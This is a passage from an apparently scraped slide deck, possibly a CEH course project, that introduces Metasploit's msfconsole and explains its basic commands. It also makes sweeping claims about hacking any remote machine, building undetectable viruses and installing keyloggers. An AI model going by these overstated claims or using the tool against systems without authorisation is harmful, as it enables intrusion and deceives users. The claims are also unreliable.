  41. 41. root@bt: ~# cd /opt/framework3/msf3/ root@bt: ~#/opt/framework3/msf3# msfconsole After sometime, the msfconsole will boot. Or you can directly use “msfconsole command” to open Metasploit. What we can do with Metasploit?  We can hack all platforms of windows, linux, sun solaris, AXI etc  We can hack any remote machine by the available exploits in adobe acrobat, 8.1.1, Winamp, Realplayer, Oracle, Mozilla, IE, yahoo messenger.  We can create un-detectable VIRUS in exe, java, pdf, mp3 etc formats.  We can sniff network traffic, and sessions for email passwords. SSL protection and data protection.
  42. 42.  We can install key logger on remote machine, record audio etc Msfconsole Commands: 1. Show Entering 'show' at the msfconsole prompt will display every module within Metasploit. There are a number of 'show' commands you can use but the ones you will use most frequently are 'show auxiliary', 'show exploits', 'show payloads', 'show encoders'. Show targets  For showing target in particular exploit. Show options  Shows the various option of exploit
  43. 43. Show advanced  shows advance option of exploit. Show payloads  It list all payloads. Show exploits  It list all exploits.
  44. 44. Show auxiliary  it list all auxiliary. 2. Use  When you have decided on a particular module to make use of, issue the 'use' command to select it. The 'use' command changes your context to a specific module, exposing type-specific commands. Notice in the output below that any global variables that were previously set are already configured.
  45. 45. 3. Set  The 'set' command allows you to configure Framework options and parameters for the current module you are working with. 4. unset  The opposite of the 'set' command, of course, is 'unset'. 'Unset' removes a parameter previously configured with 'set'. You can remove all assigned variables with 'unset all'. 5. Back  Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the
  46. 46. 'back' command to move out of the current context. This, however is not required. Just as you can in commercial routers, you can switch modules from within other modules. As a reminder, variables will only carry over if they are set globally. 6. check There aren't many exploits that support it, but there is also a 'check' option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it. 7. info  The 'info' command will provide detailed information about a particular module including all options, targets, and other
  47. 47. information. Be sure to always read the module description prior to using it as some may have un-desired effects. The info command also provides the following information: The author and licensing information Vulnerability references (ie: CVE, BID, etc) Any payload restrictions the module may have 8. search The msfconsole includes an extensive regular-expression based search functionality. If you have a general idea of what you are looking for you can search for it via 'search '. In the output below, a search is being made for MS Bulletin MS09-011. The search function will locate this string within the module names, descriptions, references, etc.
  48. 48. 9. sessions The 'sessions' command allows you to list, interact with, and kill spawned sessions. The sessions can be shells, Meterpreter sessions, VNC, etc. Session –l  To list any active sessions Session –i  To interact with a given session, you just need to use the '-i' switch followed by the Id number of the session.
  49. 49. 1. Companies started taking Information Security seriously. 2. Salary is good. 3. The field is diverse. 4. I will never be unemployed. 5. I have an opportunity to interact with everyone in the company. 6. I will set the rules (and also have the power to break them). 7. Being a security professional is cool… or at least people think it is. Reason for choosing CEH 2013
  50. 50. Gantt chart 2013
  51. 51.  Bibliography 2013